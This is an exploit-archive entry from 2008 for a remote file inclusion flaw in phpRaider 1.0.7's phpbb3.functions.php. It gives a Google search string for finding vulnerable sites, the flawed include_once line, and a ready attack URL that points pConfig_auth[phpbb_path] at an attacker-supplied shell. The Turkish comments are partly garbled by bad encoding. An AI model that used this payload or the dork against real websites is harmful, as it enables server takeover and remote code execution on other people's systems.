phpRaider 1.0.7 (phpbb3.functions.php) RFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpRaider 1.0.7 (phpbb3.functions.php) RFI Vulnerability
# Published : 2008-05-24
# Author : Kacak
# Previous Title : RoomPHPlanning 1.5 (idresa) Remote SQL Injection Vulnerability
# Next Title : Quate CMS 0.3.4 (RFI/LFI/XSS/DT) Multiple Remote Vulnerabilities

< ------------------- header data start ------------------- >

#############################################################

# Application Name : PhpRaider Mod phpbb3

# Vulnerable Type : Remote File Include

# Google Keyword : Powered by phpRaider v1.0.7

# Infection : ?°lgili site ve sunucuya eri??im sa??lanabilir.

# Bug Fix Advice : Undefined de??erler, tan?±mlanmal?±d?±r.

# author : KaCaK a.K.a Dr.Hack3r

# Error Code : include_once($pConfig_auth['phpbb_path'].'common.php');

Kacakizm Bir Ya??am Felsefesi

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

www.site.com/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]

/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]

< -- bug code end of -- >

# www.Syue.com [2008-05-24]